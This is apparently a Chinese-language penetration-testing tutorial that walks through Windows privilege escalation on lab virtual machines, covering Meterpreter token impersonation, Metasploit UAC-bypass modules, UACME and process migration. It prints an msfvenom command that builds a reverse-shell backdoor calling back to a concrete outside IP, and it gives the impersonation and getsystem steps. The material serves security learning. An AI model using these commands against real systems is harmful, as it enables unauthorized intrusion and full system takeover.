1. 程式人生 > 其它 >WIN程序注入&BypassUAC&令牌竊取

WIN程序注入&BypassUAC&令牌竊取

WIN程序注入&BypassUAC&令牌竊取

本地提權—win令牌竊取

假冒令牌可以假冒一個網路中的另一個使用者進行各類操作。

所以當一個攻擊者需要域管理員的操作許可權時候,需通過假冒域管理員的令牌進行攻擊。

我這裡用到了windowns2008虛擬機器做演示

先用msf生成一個後門

msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=3333 -f exe -o msf.exe

msf上線

use incognito 匯入模組

list_tokens -u 列出程序

impersonate_token "NT AUTHORITY\SYSTEM"

令牌竊取

獲得system許可權

BypassUAC繞過提權

什麼是UAC?如何設定?

UAC(UserAccount Control,使用者賬戶控制)

簡言之就是在Vista及更高版本中通過彈框進一步讓使用者

確認是否授權當前可執行檔案來達到阻止惡意程式的目的。

可以通過命令msconfig啟動管理器,更改UAC設定等級(預設等級)

參考:http://cn-sec.com/archives/116488.html

BypassUAC提權?常見繞過專案?

為了遠端執行目標的exe或者bat可執行檔案繞過此安全機制,以此叫BypassUAC

繞過專案:MSF內建,Powershell滲透框架,UACME專案(推薦)

https://github.com/hfiref0x/UACME

在msf自帶的提權getsystem中,如果遇到UAC,則不會成功。

win7演示:

使用msf自帶模組繞過uac

use exploit/windows/local/bypassuac

getsystem 獲得最高許可權

另外我用了Win7 虛擬機器進行 本地提權

我使用了這個模組:use exploit/windows/local/ask

但是該模組實際上只是以高許可權重啟一個返回式shellcode,並沒有繞過UAC,會觸發系統UAC,受害機器有提示,提示使用者是否要執行,如果使用者選擇“yes”,就可以程式返回一個高許可權meterpreter shell,相當於釣魚攻擊。

當用戶點選”是“後getsystem

獲得最高許可權。

程序注入

我用了win2008虛擬機器做了演示

ps命令檢視程序

migrate PID 遷移對應PID

獲得最高許可權